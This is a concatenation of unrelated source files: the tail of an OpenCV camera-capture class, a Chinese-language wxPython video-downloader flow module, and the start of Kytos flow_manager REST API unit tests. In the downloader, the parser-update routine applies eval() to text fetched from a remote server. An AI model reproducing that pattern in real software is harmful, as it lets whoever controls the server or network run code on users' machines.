self.__videoCapture__ = None
self.setQueues()
def set(self, key, value):
Configurable.set(self, key, value)
if key == 'qOut':
self.setQueues()
def __open(self):
if self.__videoCapture__ is None:
if self.get('gstEnable', False):
self.__videoCapture__ = open_gst_rtsp(self.get('videoURL'), latency=self.get('latency', 2000))
else:
self.__videoCapture__ = cv2.VideoCapture(self.get('videoURL'))
self.__measureFPS()
else:
logging.warning('Camera {} already opened'.format(self.get('name')))
def __measureFPS(self):
if self.__videoCapture__ is None:
logging.warning('Camera {} is not opened'.format(self.get('name')))
return
currentFPS = int(self.__videoCapture__.get(cv2.CAP_PROP_FPS))
defaultFPS = self.get('defaultFPS', 2)
if currentFPS > 120 or currentFPS <= 0:
logging.warning('Camera {} using defaultFPS:{}, currentFPS:{} invalid'.format(self.get('name'), defaultFPS, currentFPS))
self.__videoFPS__ = defaultFPS
else:
if defaultFPS != currentFPS:
logging.warning('Camera {} using currentFPS:{}, preferred over defaultFPS:{}'.format(self.get('name'), currentFPS, defaultFPS))
self.__videoFPS__ = currentFPS
self.__wait__ = 1.0 / self.__videoFPS__
def __release(self):
try:
self.__videoCapture__.release()
except:
pass
self.__videoCapture__ = None
def run(self):
self.__open()
while self.__running__:
sleep(self.__wait__)
self.__videoCapture__.grab()
_, frame = self.__videoCapture__.read()
if frame is None:
logging.error('Camera {} error loading frame'.format(self.get('name')))
self.__release()
self.__open()
self.__measureFPS()
else:
self.__outQ__.put((self.get('name'), frame))
self.__release()
return self
def independent_start(config):
system['cameras'] = {}
for index, config_element in enumerate(config['cameras']):
camera_name = config_element['name']
system['cameras'][camera_name] = Camera(index, config, system)
system['cameras'][camera_name].start()
def mutate_system(config):
if system.get('queues') is None:
message = 'system without queues initialized, try calling stream.ymsqueues.mutate_system(system, configio_of_queues)'
logging.error(message)
raise Exception(message)
else:
c_thread = Thread(name='CameraStarter' ,target=independent_start, args=(config,))
c_thread.daemon=True
c_thread.start()
|
flow.py
|
# -*- coding: UTF-8 -*-
"""
Flow:
[load config]
|
[check undone job]
/ \
/ \
(do)/ \(skip)
[parse backgound] [show parser frame]
| \
| (button_godownload) \
[go download] <------------------- [handle frame parser]
/ \
(done)/ \ (close win)
[go merge] [save config] ------> [END]
/ \
/ \
/ \
(done)/ (done) \(close win)
[save config] <------- [wait for merge done]
|
|
[END]
"""
from handler import settings, parser, downloader, merger
import wx
import gui
from gui import format_byte
import CommonVar as cv
import socket, os, shutil
from urllib.error import URLError
from ssl import SSLError
import threading
import pyperclip
import nbdler
from zipfile import ZipFile
from core.common import BasicUrlGroup
import traceback
# import io, importlib
from hashlib import md5
from urllib.request import urlopen, Request
from urllib.parse import urljoin
from core.common import raw_decompress
import gzip, json
TOOL_REQ_URL = {
'ffmpeg': 'https://ffmpeg.zeranoe.com/builds/win64/static/ffmpeg-3.2-win64-static.zip',
'node': 'https://npm.taobao.org/mirrors/node/v10.15.3/win-x64/node.exe',
}
HEADERS = {
'Connection': 'keep-alive',
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
'Accept-Encoding': 'gzip',
'Accept-Language': 'en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7',
}
class Entry:
"""Flow Entry"""
@staticmethod
def handle():
settings.loadConfig()
if GetTool.handle():
LoadParserCore.handle()
UndoneJob.handle()
else:
ShutDown.handle()
class LoadParserCore:
@staticmethod
def handle():
err_msg = parser.init()
if err_msg:
dlg = wx.MessageDialog(gui.frame_parse, '\n'.join(err_msg), u'核心加载错误信息', wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
class GetTool:
@staticmethod
def handle():
if not GetTool.checkNode():
return False
if not GetTool.checkFfmpeg():
return False
return True
@staticmethod
def unzip_ffmpeg(zipfile):
with ZipFile(zipfile, 'r') as f:
top_path = f.namelist()[0]
target_path = os.path.join(top_path.rstrip('/').rstrip('\\'), 'bin', 'ffmpeg.exe').replace('\\', '/')
f.extract(target_path, '.')
shutil.move(os.path.join(top_path.rstrip('/').rstrip('\\'), 'bin', 'ffmpeg.exe'), 'ffmpeg.exe')
os.remove(zipfile)
os.removedirs(os.path.join(top_path.rstrip('/').rstrip('\\'), 'bin'))
@staticmethod
def checkFfmpeg():
dlm = nbdler.Manager()
if (not os.path.exists('ffmpeg.exe') or os.path.exists('ffmpeg.exe.nbdler')) and not os.path.exists(cv.FFMPEG_PATH):
dlg = wx.MessageDialog(None, u'该程序需要ffmpeg.exe才能完成工作,是否要下载?', u'提示', wx.YES_NO | wx.ICON_INFORMATION)
if dlg.ShowModal() != wx.ID_YES:
return False
dl = nbdler.open(urls=[TOOL_REQ_URL['ffmpeg']],
max_conn=16, filename='ffmpeg.zip')
dlm.addHandler(dl)
dlg = gui.DialogGetTool(gui.frame_downloader, u'正在下载 Ffmpeg 3.2.zip', dl.getFileSize(), dlm)
dlg.Bind(wx.EVT_TIMER, GetTool._process, dlg.timer)
dlg.timer.Start(50, oneShot=False)
dlm.run()
msg = dlg.ShowModal()
if not dlm.isEnd():
dlm.shutdown()
dlg.Destroy()
return False
GetTool.unzip_ffmpeg('ffmpeg.zip')
if msg == wx.ID_OK:
return True
else:
return False
else:
return True
@staticmethod
def checkNode():
dlm = nbdler.Manager()
if not os.path.exists('node.exe') or os.path.exists('node.exe.nbdler'):
dlg = wx.MessageDialog(None, u'该程序需要Nodejs.exe才能完成工作,是否要下载?', u'提示', wx.YES_NO | wx.ICON_INFORMATION)
if dlg.ShowModal() != wx.ID_YES:
return False
dl = nbdler.open(urls=[TOOL_REQ_URL['node']],
max_conn=16, filename='node.exe')
dlm.addHandler(dl)
dlg = gui.DialogGetTool(gui.frame_downloader, u'正在下载 Nodejs v10.15.3', dl.getFileSize(), dlm)
dlg.Bind(wx.EVT_TIMER, GetTool._process, dlg.timer)
dlg.timer.Start(50, oneShot=False)
dlm.run()
msg = dlg.ShowModal()
dlm.shutdown()
dlg.Destroy()
if msg == wx.ID_OK:
return True
else:
return False
else:
return True
@staticmethod
def _process(event):
dlg = event.Timer.GetOwner()
dlm = dlg.dlm
runs = dlm.getRunQueue()
if runs:
dl = dlm.getHandler(id=runs[0])
dlg.update(dl.getIncByte(), dl.getFileSize())
if dlm.isEnd():
dones = dlm.getDoneQueue()
if dones:
dl = dlm.getHandler(id=dones[0])
dlg.update(dl.getFileSize(), dl.getFileSize())
event.Timer.Stop()
dlg.EndModal(wx.ID_OK)
class UndoneJob:
"""Undone Job Handler:
if the window is closed while there was a job running last time.
"""
@staticmethod
def handle():
if cv.UNDONE_JOB:
if 'url' not in cv.UNDONE_JOB or 'quality' not in cv.UNDONE_JOB or 'features' not in cv.UNDONE_JOB:
ConfigSettings.fail()
FrameParser.handle()
else:
msg = '[Url]: %s\n[Title]: %s\n[Quality]: %s\n上一次任务尚未完成,是否继续任务?' \
% (cv.UNDONE_JOB['url'], cv.UNDONE_JOB.get('title'), cv.UNDONE_JOB['quality'])
dlg = wx.MessageDialog(None, msg, '提示', wx.YES_NO | wx.ICON_INFORMATION)
if dlg.ShowModal() == wx.ID_YES:
UndoneJob.do()
else:
UndoneJob.skip()
dlg.Destroy()
else:
FrameParser.handle()
@staticmethod
def do():
threading.Thread(target=UndoneJob._do).start()
@staticmethod
def _do():
def __(sel_res):
if not sel_res:
ShutDown.handle()
return
if FrameParser.MenuGoDownload.handler_audio(sel_res):
FrameDownload.handle()
else:
FrameParser.handle()
try:
url = cv.UNDONE_JOB['url']
quality = cv.UNDONE_JOB['quality']
features = cv.UNDONE_JOB['features']
sel_res = parser.matchParse(url, quality, features)
except (socket.timeout, URLError, SSLError):
wx.CallAfter(UndoneJob.timeout)
else:
if not sel_res:
wx.CallAfter(UndoneJob.empty)
else:
cv.SEL_RES = sel_res
wx.CallAfter(__, sel_res)
@staticmethod
def empty():
dlg = wx.MessageDialog(gui.frame_parse, u'数据返回为空。', u'错误', wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
@staticmethod
def timeout():
dlg = wx.MessageDialog(gui.frame_parse, u'请求超时,是否重试?', u'错误', wx.YES_NO | wx.ICON_ERROR)
if dlg.ShowModal() == wx.ID_YES:
UndoneJob.do()
else:
UndoneJob.skip()
dlg.Destroy()
@staticmethod
def skip():
FrameParser.handle()
class FrameParser:
"""Frame Parser Flow Handler"""
@staticmethod
def handle():
gui.frame_parse.Show()
# if gui.frame_parse.ShowModal() == cv.ID_PARSER_GODOWNLOAD:
# FrameDownload.handle()
# else:
# ShutDown.handle()
class ButtonParse:
"""Frame Parser Button-[Parser] Handler"""
@staticmethod
def handle():
gui.frame_parse.button_parse.Enable(False)
url = gui.frame_parse.textctrl_url.GetLineText(0)
qualitys = []
for i in range(1, 7):
if getattr(gui.frame_parse, 'checkbox_%d' % i).GetValue():
qualitys.append(i)
threading.Thread(target=FrameParser.ButtonParse._parse, args=(url, qualitys,), daemon=True).start()
@staticmethod
def timeout():
dlg = wx.MessageDialog(gui.frame_parse, u'请求超时,请重试!', u'错误', wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
@staticmethod
def empty():
dlg = wx.MessageDialog(gui.frame_parse, u'数据返回为空。', u'错误', wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
@staticmethod
def exception(msg):
wx.MessageDialog(gui.frame_parse, msg, u'解析异常', wx.OK | wx.ICON_ERROR).ShowModal()
@staticmethod
def _parse(url, qualitys):
try:
res = parser.parse(url, qualitys)
except (socket.timeout, URLError, SSLError):
wx.CallAfter(FrameParser.ButtonParse.timeout)
except Exception as e:
msg = traceback.format_exc()
# print(traceback.format_exc())
wx.CallAfter(FrameParser.ButtonParse.exception, msg)
else:
if not res:
wx.CallAfter(FrameParser.ButtonParse.empty)
else:
wx.CallAfter(FrameParser.ButtonParse.appendItem, res)
finally:
wx.CallAfter(gui.frame_parse.button_parse.Enable, True)
wx.CallAfter(gui.frame_parse.button_parse.SetLabelText, u'解析')
@staticmethod
def appendItem(res):
gui.frame_parse.listctrl_parse.DeleteAllItems()
# try:
for i in res:
audios_info = i.getAllAudioInfo()
file_num_str = i.getVideoTotal() if not audios_info else '%d+%d' % (i.getVideoTotal(), i.getAudioTotal())
file_size_str = format_byte(i.getVideoSize(), '%.1f%s' if not audios_info else '%.1f%s+')
data = (i.getQuality(), i.getScreenSize(), file_num_str, file_size_str,
str(len(audios_info)) if audios_info else 0,
i.getFileFormat(),
u'√' if i.getM3U8() else u'×')
gui.frame_parse.listctrl_parse.Append(data)
gui.frame_parse.SetTitle(res[0].getVideoLegalTitle())
class MenuCopyLink:
"""Frame Parser Button-[Copy] Handler"""
@staticmethod
def handle():
index = gui.frame_parse.listctrl_parse.GetFirstSelected()
if index != -1:
# dlg = gui.DialogCopyLink(gui.frame_parse)
gui.dialog_copylink.listctrl_links.DeleteAllItems()
wx.CallAfter(gui.dialog_copylink.ShowModal)
sel_res = parser.getRespond()[index]
threading.Thread(target=FrameParser.MenuCopyLink._getinfo, args=(sel_res,)).start()
@staticmethod
def _getinfo(sel_res):
cv.CPYLINK_SEL_ITEMS = {}
cv.LISTCTRL_ITEMS = []
if sel_res.getM3U8():
data = ('', u'', u'√', 'V', u'以下是M3U8内容')
cv.LISTCTRL_ITEMS.append(data)
wx.CallAfter(gui.dialog_copylink.listctrl_links.Append, data, wx.Colour(255, 0, 0))
data = ('0', u'', u'√', 'V', sel_res.getM3U8())
cv.CPYLINK_SEL_ITEMS['video_m3u8'] = [data]
cv.LISTCTRL_ITEMS.append(data)
wx.CallAfter(gui.dialog_copylink.listctrl_links.Append, data)
if sel_res.getM3U8Urls():
data = ('', u'√', u'', 'V', u'以下是M3U8链接')
cv.LISTCTRL_ITEMS.append(data)
wx.CallAfter(gui.dialog_copylink.listctrl_links.Append, data, wx.Colour(255, 0, 0))
tmp = []
for i, j in enumerate(sel_res.getM3U8Urls()):
data = (str(i), u'√', u'', 'V', str(j))
tmp.append(data)
wx.CallAfter(gui.dialog_copylink.listctrl_links.Append, data)
cv.CPYLINK_SEL_ITEMS['video_m3u8'] = tmp
cv.LISTCTRL_ITEMS.extend(tmp)
if sel_res.getVideoUrls():
data = ('', u'√', u'', 'V', u'以下是目标视频下载链接')
cv.LISTCTRL_ITEMS.append(data)
wx.CallAfter(gui.dialog_copylink.listctrl_links.Append, data, wx.Colour(0, 0, 255))
tmp = []
for m, i in enumerate(sel_res.getVideoUrls()):
if isinstance(i, BasicUrlGroup):
for n, j in enumerate(i):
if isinstance(j, list) or isinstance(j, tuple):
preview = j[0]
elif isinstance(j, str):
preview = j
else:
raise TypeError()
data = ('%d(%03d)' % (m, n), u'√', u'', 'V', preview)
tmp.append(data)
wx.CallAfter(gui.dialog_copylink.listctrl_links.Append, data)
elif isinstance(i, list) or isinstance(i, tuple):
data = (str(m), u'√', u'', 'V', i[0])
tmp.append(data)
wx.CallAfter(gui.dialog_copylink.listctrl_links.Append, data)
elif isinstance(i, str):
data = (str(m), u'√', u'', 'V', i)
tmp.append(data)
wx.CallAfter(gui.dialog_copylink.listctrl_links.Append, data)
else:
raise TypeError()
cv.CPYLINK_SEL_ITEMS['video_links'] = tmp
cv.LISTCTRL_ITEMS.extend(tmp)
if sel_res.getAudioUrls():
data = ('', u'√', u'', 'A', u'以下是目标音频下载链接')
cv.LISTCTRL_ITEMS.append(data)
wx.CallAfter(gui.dialog_copylink.listctrl_links.Append, data, wx.Colour(0, 0, 255))
tmp = []
for m, i in enumerate(sel_res.getAudioUrls()):
if isinstance(i, BasicUrlGroup):
for n, j in enumerate(i):
if isinstance(j, list) or isinstance(j, tuple):
preview = j[0]
elif isinstance(j, str):
preview = j
else:
raise TypeError()
data = ('%d(%03d)' % (m, n), u'√', u'', 'A', preview)
tmp.append(data)
wx.CallAfter(gui.dialog_copylink.listctrl_links.Append, data)
elif isinstance(i, list) or isinstance(i, tuple):
data = (str(m), u'√', u'', 'A', i[0])
tmp.append(data)
wx.CallAfter(gui.dialog_copylink.listctrl_links.Append, data)
elif isinstance(i, str):
data = (str(m), u'√', u'', 'A', i)
tmp.append(data)
wx.CallAfter(gui.dialog_copylink.listctrl_links.Append, data)
else:
raise TypeError()
cv.CPYLINK_SEL_ITEMS['audio_links'] = tmp
cv.LISTCTRL_ITEMS.extend(tmp)
@staticmethod
def timeout():
dlg = wx.MessageDialog(gui.dialog_copylink, u'请求超时,请重试!', u'错误', wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
class UpdateParser:
@staticmethod
def handle():
parser_info = FrameParser.UpdateParser.prepare()
if parser_info:
FrameParser.UpdateParser.do(parser_info)
else:
dlg = wx.MessageDialog(gui.frame_downloader, '解析核心已经是最新了!', '提示', wx.OK | wx.ICON_INFORMATION)
dlg.ShowModal()
dlg.Destroy()
@staticmethod
def prepare():
req = Request(urljoin(cv.REPO, 'repo'), headers=HEADERS)
res = urlopen(req)
text = raw_decompress(res.read(), res.info())
parser_info = eval(text)
for i, j in list(parser_info.items()):
if os.path.exists(os.path.join(cv.PARSER_PATH, i)):
with open(os.path.join(cv.PARSER_PATH, i), 'rb') as f:
_md5 = md5()
_md5.update(f.read())
if _md5.hexdigest() == j:
del parser_info[i]
return parser_info
@staticmethod
def do(parser_info):
avl = list(parser_info.keys())
dlg = wx.MultiChoiceDialog(gui.frame_parse, u'以下核心可以更新', u'更新核心', avl)
if dlg.ShowModal() != wx.ID_OK:
dlg.Destroy()
return False
sel = dlg.GetSelections()
for i in sel:
# for i, j in parser_info.items():
dlm = nbdler.Manager()
dl = nbdler.open(urls=[urljoin(cv.REPO, avl[i])], max_conn=3, filename=avl[i] + '.gzip', block_size=1,
filepath=cv.PARSER_PATH)
dlm.addHandler(dl)
dlg = gui.DialogGetTool(gui.frame_parse, u'正在下载 %s.gzip' % avl[i], dl.getFileSize(), dlm)
dlg.Bind(wx.EVT_TIMER, GetTool._process, dlg.timer)
dlg.timer.Start(50, oneShot=False)
dlm.run()
msg = dlg.ShowModal()
if msg != wx.ID_OK:
return False
else:
try:
with open(os.path.join(cv.PARSER_PATH, avl[i]), 'w') as f:
f.write(gzip.open(os.path.join(cv.PARSER_PATH, avl[i] + '.gzip')).read().decode('utf-8'))
os.remove(os.path.join(cv.PARSER_PATH, avl[i] + '.gzip'))
except:
dlg = wx.MessageDialog(gui.frame_parse, traceback.format_exc(), avl[i], wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
dlg.Destroy()
dlg = wx.MessageDialog(gui.frame_parse, '核心更新完成!', '提示', wx.OK | wx.ICON_INFORMATION)
dlg.ShowModal()
dlg.Destroy()
LoadParserCore.handle()
class MenuGoDownload:
"""Frame Parser Button-[GoDownload] Handler"""
@staticmethod
def handle():
gui.frame_parse.listctrl_parse.menu.godownload.Enable(False)
index = gui.frame_parse.listctrl_parse.GetFirstSelected()
if index != -1:
sel_res = parser.getRespond()[index]
if FrameParser.MenuGoDownload.handler_audio(sel_res):
threading.Thread(target=FrameParser.MenuGoDownload._download, args=(sel_res,)).start()
@staticmethod
def handler_audio(sel_res):
audio_info = sel_res.getAllAudioInfo()
if audio_info:
dlg = wx.SingleChoiceDialog(gui.frame_parse, u'Pick the AUDIO you prefer', u'Audio Choice', audio_info)
if dlg.ShowModal() == wx.ID_OK:
index = audio_info.index(dlg.GetStringSelection())
sel_res.setSelAudio(index)
dlg.Destroy()
else:
dlg.Destroy()
return False
return True
@staticmethod
def timeout():
dlg = wx.MessageDialog(gui.frame_parse, u'Msg:\"请求被服务器中止或网络超时。\"', u'错误', wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
# gui.frame_parse.button_godownload.Enable(True)
@staticmethod
def _download(sel_res):
try:
sel_res.getVideoUrls()
except:
wx.CallAfter(FrameParser.MenuGoDownload.timeout)
else:
cv.SEL_RES = sel_res
wx.CallAfter(FrameDownload.handle)
finally:
gui.frame_parse.listctrl_parse.menu.godownload.Enable(True)
class FrameDownload:
"""Frame Download Handler"""
@staticmethod
def handle():
# io
# gui.dialog_dllog.start_logger()
gui.frame_parse.Hide()
FrameDownload.Download.handle()
class Download:
"""Frame Download - [Download] Handler"""
@staticmethod
def handle():
downloader.init()
FrameDownload.Download.prepare()
downloader.run()
threading.Thread(target=FrameDownload.Download._download_insp).start()
@staticmethod
def prepare():
downloader.prepare(cv.SEL_RES)
gui.frame_downloader.setTitleName(cv.SEL_RES.getVideoLegalTitle())
gui.frame_downloader.initTotal(cv.SEL_RES.getTotalFileSize())
for i in range(cv.SEL_RES.getVideoTotal()):
gui.frame_downloader.insertBlock(i)
for i in range(cv.SEL_RES.getAudioTotal()):
gui.frame_downloader.insertBlock(i + cv.SEL_RES.getVideoTotal())
gui.setTimerHandler(downloader.getProcessEvent())
gui.runTimer(500, False)
gui.frame_downloader.Show(True)
@staticmethod
def _download_insp():
downloader.join()
if cv.SHUTDOWN:
url = cv.SEL_RES.getBaseUrl()
quality = cv.SEL_RES.getQuality()
title = cv.SEL_RES.getVideoLegalTitle()
settings.setUndoneJob(url, title, quality, cv.SEL_RES.getFeatures())
settings.saveConfig()
# wx.CallAfter(ShutDown.handle)
else:
wx.CallAfter(Merge.handle)
class Merge:
"""Frame Download Handler"""
@staticmethod
def handle():
if not downloader.isAllDone():
Merge.fileNotAllFound()
else:
Merge.prepare()
Merge.do()
@staticmethod
def prepare():
gui.frame_downloader.Hide()
gui.frame_merger.Show()
@staticmethod
def do():
# if downloader.getAllAudioFilePath():
# wx.CallAfter(gui.frame_merger.Show)
threading.Thread(target=Merge._do).start()
@staticmethod
def _do():
video_src = downloader.getAllVideoFilePath()
audio_src = downloader.getAllAudioFilePath()
video_dst = downloader.getDstVideoFilePath()
audio_dst = downloader.getDstAudioFilePath()
if video_src:
if len(video_src) == 1 and cv.TARGET_FORMAT == '':
shutil.move(video_src[0], video_dst)
else:
# mer = merger.make(video_dst, video_src, method=merger.MET_CONCAT, merger=cv.SEL_RES.getConcatMerger())
mer = merger.make(video_dst, video_src, cv.SEL_RES.getConcatMethod())
mer.start()
mer.join()
if audio_src:
if len(audio_src) == 1 and cv.TARGET_FORMAT == '':
shutil.move(audio_src[0], audio_dst)
else:
# mer = merger.make(audio_dst, audio_src, method=merger.MET_CONCAT, merger=cv.SEL_RES.getConcatMerger())
mer = merger.make(audio_dst, audio_src, cv.MER_CONCAT_DEMUXER)
mer.start()
mer.join()
if video_src and audio_src:
src = [video_dst, audio_dst]
dst = downloader.getDstFilePath()
mer = merger.make(dst, src, cv.MER_VIDEO_AUDIO)
mer.start()
mer.join()
dst = downloader.getDstFilePath() + cv.TARGET_FORMAT
settings.clearUndoneJob()
settings.saveConfig()
if not cv.SHUTDOWN:
if os.path.exists(dst):
wx.CallAfter(Merge.success)
else:
wx.CallAfter(Merge.fail)
@staticmethod
def fail():
dlg = wx.MessageDialog(gui.frame_downloader, '发生未知错误,无法生成最终视频!', '错误', wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
@staticmethod
def fileNotAllFound():
dlg = wx.MessageDialog(gui.frame_downloader, '未找到所有分段文件,请重启程序重试!', '错误', wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
@staticmethod
def success():
cv.ALLTASKDONE = True
dlg = wx.MessageDialog(gui.frame_downloader, u'视频已经合并完成,是否删除分段文件?', u'提示', wx.YES_NO | wx.ICON_INFORMATION)
if dlg.ShowModal() == wx.ID_YES:
merger.del_src_files()
dlg = wx.MessageDialog(gui.frame_downloader, u'分段文件删除完成。', u'提示')
dlg.ShowModal()
dlg.Destroy()
class ConfigSettings:
@staticmethod
def fail():
settings.initConfig()
dlg = wx.MessageDialog(gui.frame_parse, 'config.ini文件错误。', '错误', wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
class ShutDown:
@staticmethod
def handle():
gui.dialog_dllog.Show()
threading.Thread(target=ShutDown._do).start()
@staticmethod
def _do():
thr = threading.Thread(target=ShutDown._shutdown)
thr.start()
thr.join()
wx.CallAfter(ShutDown.destroy_frame)
@staticmethod
def destroy_frame():
gui.dialog_dllog.Destroy()
gui.frame_parse.Destroy()
gui.frame_downloader.Destroy()
gui.frame_merger.Destroy()
@staticmethod
def _shutdown():
cv.SHUTDOWN = True
merger.shutdown()
downloader.shutdown()
@staticmethod
def frame_parser_close(event):
if cv.SHUTDOWN:
event.Skip()
else:
gui.frame_parse.Hide()
ShutDown.handle()
@staticmethod
def frame_downloader_close(event):
if cv.SHUTDOWN:
event.Skip()
else:
dlg = wx.MessageDialog(gui.frame_downloader, u'你确定要中止下载吗?', u'提示', style=wx.YES_NO | wx.ICON_INFORMATION)
if dlg.ShowModal() == wx.ID_YES:
gui.frame_downloader.Hide()
ShutDown.handle()
dlg.Destroy()
@staticmethod
def frame_merger_close(event):
if cv.SHUTDOWN:
event.Skip()
else:
if not cv.ALLTASKDONE:
dlg = wx.MessageDialog(gui.frame_merger, u'你确定要中止操作吗?', u'提示', style=wx.YES_NO | wx.ICON_INFORMATION)
if dlg.ShowModal() == wx.ID_YES:
gui.frame_merger.Hide()
ShutDown.handle()
dlg.Destroy()
else:
gui.frame_merger.Hide()
ShutDown.handle()
class CopyLink:
@staticmethod
def handle():
pass
@staticmethod
def copysel():
cpy_list = []
next_index = gui.dialog_copylink.listctrl_links.GetFirstSelected()
while next_index != -1:
data = cv.LISTCTRL_ITEMS[next_index][4]
cpy_list.append(data)
next_index = gui.dialog_copylink.listctrl_links.GetNextSelected(next_index)
pyperclip.copy('\n'.join(cpy_list))
CopyLink.success()
@staticmethod
def copygroup():
sel_index = gui.dialog_copylink.listctrl_links.GetFirstSelected()
sel_key = ''
link_text = gui.dialog_copylink.listctrl_links.GetItemText(sel_index, 1)
type_text = gui.dialog_copylink.listctrl_links.GetItemText(sel_index, 3)
if link_text == u'√' and type_text == 'V':
sel_key = 'video_links'
elif link_text != u'√' and type_text == 'V':
sel_key = 'video_m3u8'
elif link_text == u'√' and type_text == 'A':
sel_key = 'audio_links'
if sel_key:
content_list = [i[4] for i in cv.CPYLINK_SEL_ITEMS[sel_key]]
pyperclip.copy('\n'.join(content_list))
CopyLink.success()
@staticmethod
def success():
dlg = wx.MessageDialog(gui.dialog_copylink, u'写入到剪切板成功!', u'完成')
dlg.ShowModal()
dlg.Destroy()
|
test_main.py
|
"""Test Main methods."""
import threading
from unittest import TestCase
from unittest.mock import MagicMock, patch
from uuid import uuid4
from napps.kytos.flow_manager.exceptions import (
InvalidCommandError,
SwitchNotConnectedError,
)
from napps.kytos.flow_manager.main import FlowEntryState
from kytos.core.helpers import now
from kytos.lib.helpers import (
get_connection_mock,
get_controller_mock,
get_kytos_event_mock,
get_switch_mock,
get_test_client,
)
# pylint: disable=too-many-lines,fixme
# TODO split this test suite in smaller ones
# pylint: disable=protected-access, too-many-public-methods
class TestMain(TestCase):
"""Tests for the Main class."""
API_URL = "http://localhost:8181/api/kytos/flow_manager"
def setUp(self):
patch("kytos.core.helpers.run_on_thread", lambda x: x).start()
# pylint: disable=import-outside-toplevel
from napps.kytos.flow_manager.main import Main
self.addCleanup(patch.stopall)
controller = get_controller_mock()
self.switch_01 = get_switch_mock("00:00:00:00:00:00:00:01", 0x04)
self.switch_01.is_enabled.return_value = True
self.switch_01.flows = []
self.switch_02 = get_switch_mock("00:00:00:00:00:00:00:02", 0x04)
self.switch_02.is_enabled.return_value = False
self.switch_02.flows = []
controller.switches = {
"00:00:00:00:00:00:00:01": self.switch_01,
"00:00:00:00:00:00:00:02": self.switch_02,
}
self.napp = Main(controller)
def test_rest_list_without_dpid(self):
"""Test list rest method withoud dpid."""
flow_dict = {
"priority": 13,
"cookie": 84114964,
"command": "add",
"match": {"dl_dst": "00:15:af:d5:38:98"},
}
flow_dict_2 = {
"priority": 18,
"cookie": 84114964,
"command": "add",
"match": {"dl_dst": "00:15:af:d5:38:98"},
}
flow_1 = MagicMock()
flow_1.as_dict.return_value = flow_dict
flow_2 = MagicMock()
flow_2.as_dict.return_value = flow_dict_2
self.switch_01.flows.append(flow_1)
self.switch_02.flows.append(flow_2)
api = get_test_client(self.napp.controller, self.napp)
url = f"{self.API_URL}/v2/flows"
response = api.get(url)
expected = {
"00:00:00:00:00:00:00:01": {"flows": [flow_dict]},
"00:00:00:00:00:00:00:02": {"flows": [flow_dict_2]},
}
self.assertEqual(response.json, expected)
self.assertEqual(response.status_code, 200)
def test_rest_list_with_dpid(self):
"""Test list rest method with dpid."""
flow_dict = {
"priority": 13,
"cookie": 84114964,
"command": "add",
"match": {"dl_dst": "00:15:af:d5:38:98"},
}
flow_1 = MagicMock()
flow_1.as_dict.return_value = flow_dict
self.switch_01.flows.append(flow_1)
api = get_test_client(self.napp.controller, self.napp)
url = f"{self.API_URL}/v2/flows/00:00:00:00:00:00:00:01"
response = api.get(url)
expected = {"00:00:00:00:00:00:00:01": {"flows": [flow_dict]}}
self.assertEqual(response.json, expected)
self.assertEqual(response.status_code, 200)
def test_list_flows_fail_case(self):
"""Test the failure case to recover all flows from a switch by dpid.
Failure case: Switch not found.
"""
api = get_test_client(self.napp.controller, self.napp)
url = f"{self.API_URL}/v2/flows/00:00:00:00:00:00:00:05"
response = api.get(url)
self.assertEqual(response.status_code, 404)
@patch("napps.kytos.flow_manager.main.Main._install_flows")
def test_rest_add_and_delete_without_dpid(self, mock_install_flows):
"""Test add and delete rest method without dpid."""
api = get_test_client(self.napp.controller, self.napp)
for method in ["flows", "delete"]:
url = f"{self.API_URL}/v2/{method}"
response_1 = api.post(url, json={"flows": [{"priority": 25}]})
response_2 = api.post(url)
self.assertEqual(response_1.status_code, 202)
self.assertEqual(response_2.status_code, 400)
self.assertEqual(mock_install_flows.call_count, 2)
@patch("napps.kytos.flow_manager.main.Main._install_flows")
def test_rest_add_and_delete_with_dpid(self, mock_install_flows):
"""Test add and delete rest method with dpid."""
api = get_test_client(self.napp.controller, self.napp)
data = {"flows": [{"priority": 25}]}
for method in ["flows", "delete"]:
url_1 = f"{self.API_URL}/v2/{method}/00:00:00:00:00:00:00:01"
url_2 = f"{self.API_URL}/v2/{method}/00:00:00:00:00:00:00:02"
response_1 = api.post(url_1, json=data)
response_2 = api.post(url_2, json=data)
self.assertEqual(response_1.status_code, 202)
if method == "delete":
self.assertEqual(response_2.status_code, 202)
self.assertEqual(mock_install_flows.call_count, 3)
@patch("napps.kytos.flow_manager.main.Main._install_flows")
def test_rest_add_and_delete_with_dpi_fail(self, mock_install_flows):
"""Test fail case the add and delete rest method with dpid."""
api = get_test_client(self.napp.controller, self.napp)
data = {"flows": [{"priority": 25}]}
for method in ["flows", "delete"]:
url_1 = f"{self.API_URL}/v2/{method}/00:00:00:00:00:00:00:01"
url_2 = f"{self.API_URL}/v2/{method}/00:00:00:00:00:00:00:02"
url_3 = f"{self.API_URL}/v2/{method}/00:00:00:00:00:00:00:03"
response_1 = api.post(url_1)
response_2 = api.post(url_2, data=data)
response_3 = api.post(url_2, json={})
response_4 = api.post(url_3, json=data)
self.assertEqual(response_1.status_code, 400)
self.assertEqual(response_2.status_code, 415)
self.assertEqual(response_3.status_code, 400)
self.assertEqual(response_4.status_code, 404)
self.assertEqual(mock_install_flows.call_count, 0)
@patch("napps.kytos.flow_manager.main.Main._install_flows")
def test_rest_flow_mod_add_switch_not_connected(self, mock_install_flows):
"""Test sending a flow mod when a swith isn't connected."""
api = get_test_client(self.napp.controller, self.napp)
mock_install_flows.side_effect = SwitchNotConnectedError(
"error", flow=MagicMock()
)
url = f"{self.API_URL}/v2/flows"
